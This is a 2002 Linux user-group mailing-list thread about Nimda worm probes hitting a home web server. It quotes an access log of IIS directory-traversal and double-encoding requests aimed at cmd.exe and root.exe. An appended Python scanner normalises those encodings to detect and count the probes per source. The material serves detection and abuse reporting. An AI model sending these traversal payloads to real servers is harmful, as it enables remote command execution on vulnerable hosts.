[plug] Anyone seen this particular attack pattern before?

Alan Graham alan.graham at infonetsystems.com.au
Thu Jan 17 11:17:32 WST 2002


Apologies, I should have done more research.  It's NIMDA.

Anyone have an answer to NIMDA?  Or is it just something we have to put up
with until it dies out?  I'm getting a few hundred hits a day.

Alan
----- Original Message -----
From: Alan Graham <alan.graham at infonetsystems.com.au>
To: <plug at plug.linux.org.au>
Sent: Thursday, January 17, 2002 11:03 AM
Subject: [plug] Anyone seen this particular attack pattern before?


> I've just set up a web server on my firewall, to show some photos of the
> kids to my folks in England.  Within a few days, I started seeing this
> attack.  It comes in regularly, from a lot of different IPs, and it's
> obviously aimed at NT IIS.  Ha.  I'm thinking it's a well known scripted
> attack, or possibly a zombied attack?  There's a pause of about 5 minutes
> between each attack.  The pisser is that most of the hosts appear to be
> within iinet.  I suppose I'd better let them know too.
>
> Can anyone tell me any more about it?
>
> Extract of access_log
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
>
> Regards
>
> Alan Graham
>
>
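
An added example, not part of the post or the thread: a small Python scanner that normalises the encoded traversal forms seen in the log extract above the way the vulnerable IIS decoder did (double percent-decoding for the %255c and %%35%63 variants, overlong two-byte UTF-8 for the %c0%af and %c1%1c variants), labels each request as a root.exe or cmd.exe probe, and counts the probes per source address. The log lines, source addresses and timestamps in it are constructed for the example, since the extract in the post shows only the request field; the function names are my own and not from any tool.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote_to_bytes

# Constructed sample access_log lines in Apache combined format, modelled on the
# request strings quoted in the post (which shows only the request field). The
# source addresses and timestamps are made up, from the RFC 5737 documentation
# ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jan/2002:10:58:01 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
192.0.2.10 - - [17/Jan/2002:10:58:02 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
192.0.2.10 - - [17/Jan/2002:10:58:03 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
192.0.2.10 - - [17/Jan/2002:10:58:04 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
198.51.100.7 - - [17/Jan/2002:11:03:15 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
198.51.100.7 - - [17/Jan/2002:11:03:16 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
198.51.100.7 - - [17/Jan/2002:11:03:17 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
203.0.113.5 - - [17/Jan/2002:11:04:00 +0800] "GET /photos/index.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Jan/2002:11:04:01 +0800] "GET /photos/kids1.jpg HTTP/1.0" 200 48211 "http://example.net/photos/" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def iis_lenient_decode(raw: bytes) -> str:
    """Emulate the two-byte UTF-8 handling of the vulnerable IIS decoder.

    Overlong lead bytes 0xC0/0xC1 are accepted and the continuation byte's top
    bits are never checked, so %c0%af and %c0%2f both become '/', while
    %c1%9c and %c1%1c both become '\\'.  Every other byte passes through
    unchanged (latin-1); this is a normaliser for detection, not a real
    UTF-8 decoder, so well-formed multibyte paths are not preserved.
    """
    out: List[str] = []
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(lead))
            i += 1
    return "".join(out)


def normalise_path(path: str, passes: int = 2) -> str:
    """Percent-decode up to `passes` times (so %255c -> %5c -> '\\', and the
    %%35%63 form the worm also tries), apply the lenient decoder after each
    pass, fold backslashes to '/', and lower-case the result."""
    current = path
    for _ in range(passes):
        decoded = iis_lenient_decode(unquote_to_bytes(current))
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/").lower()


def classify_request(target: str) -> Optional[str]:
    """Label a request target as a Nimda-style probe, or None if it looks benign."""
    path = target.split("?", 1)[0]          # drop the ?/c+dir command argument
    norm = normalise_path(path)
    if norm.endswith("/root.exe"):
        return "root.exe"                    # cmd.exe copy left behind by Code Red II
    if norm.endswith("/cmd.exe"):
        if "/../" in norm:
            return "cmd.exe-traversal"       # decoded ../ escaping the scripts dir
        return "cmd.exe-direct"              # /c/winnt/... via a drive-share alias
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse combined-format lines and return one record per probe found."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m.group("target"))
        if label:
            hits.append({"ip": m.group("ip"), "status": m.group("status"),
                         "label": label, "target": m.group("target")})
    return hits


def source_counts(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Probe count per source address: the figures to hand to an abuse desk."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]:<14} {h["status"]} {h["label"]:<18} {h["target"]}')
    print(source_counts(found))
```

On an Apache host like the one in the post the 404 and 400 statuses show the requests going nowhere, and the per-source counts are the part worth attaching to an abuse report to the upstream ISP. On an IIS host the thing to look for is the same targets answered with a 200, which means the traversal decoded and the command ran.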


